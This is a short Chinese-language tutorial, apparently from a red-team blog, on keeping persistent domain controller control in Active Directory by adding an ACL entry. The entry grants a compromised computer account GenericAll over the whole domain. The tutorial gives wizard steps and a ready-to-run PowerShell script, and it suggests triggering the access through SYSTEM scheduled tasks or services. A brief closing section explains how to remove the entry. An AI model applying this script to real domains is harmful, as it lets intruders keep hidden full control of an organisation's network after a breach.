通過ACL維持域控權限

前置要求

1. 已獲得域管理權限
2. 有一臺域下的計算機SYSTEM權限

相較于其他維權方式的優點：

常見的方法都是圍繞著用戶、密碼、票據來實現權限維持。

此方法不需要添加域賬號，也就不用為密碼過期、賬號禁用、票據操作而頭疼。

操作步驟

界面上操作

1. 右鍵域->委派控制

1. 
   
2. 添加->高級->對象類型->勾選計算機 找到有權限的計算機

1. 
   
2. 創建自定義任務

1. 
   
2. 默認值，下一步

1. 
   
2. 選擇完全控制

使用powershell修改

powershell

1
2
3
4
5
6
7
8
9
10
Import-Module ActiveDirectory
$ad = [ADSI]("LDAP://DC=zpyjjd,DC=com")
$computer = Get-ADComputer -Identity "WIN-N39A9OGCR8N"
$Identity = New-Object 'Security.Principal.SecurityIdentifier' $computer.SID.Value
$rights = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
$type = [System.Security.AccessControl.AccessControlType]::Allow
$inherit = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity,$rights,$type,$inherit
$ad.ObjectSecurity.AddAccessRule($ace)
$ad.CommitChanges()

此時該計算機就具備整個域控的權限。

如何觸發

1. 可以通過計劃任務，創建一個SYSTEM權限運行計劃
2. 也可以通過創建SYSTEM運行的服務來觸發

如何刪除

1. 選擇高級功能
2. 右鍵域，選擇屬性。再選擇安全，最后選擇之前添加的計算機，點擊刪除